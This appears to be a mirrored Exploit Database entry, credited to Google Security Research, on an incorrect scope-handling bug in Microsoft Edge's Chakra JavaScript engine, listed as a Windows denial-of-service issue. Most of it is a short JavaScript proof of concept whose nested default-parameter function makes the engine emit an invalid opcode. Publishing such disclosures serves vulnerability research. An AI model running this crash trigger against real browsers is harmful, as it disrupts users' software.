Microsoft Edge Chakra – Incorrect Scope Handling

• Exploit Database
• 117 阅读

• 作者： Google Security Research
  日期： 2018-01-17
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/43715/
• 1 2 3 4 5 6 7 8 9 10 11 12 13

  // PoC:   (function func(arg = function () { print(func);// SetHasOwnLocalInClosure should be called for the param scope in the PostVisitFunction function. }()) { print(func); function func() {   } })();   // Chakra fails to distinguish whether the function is referenced in the param scope and ends up to emit an invalid opcode.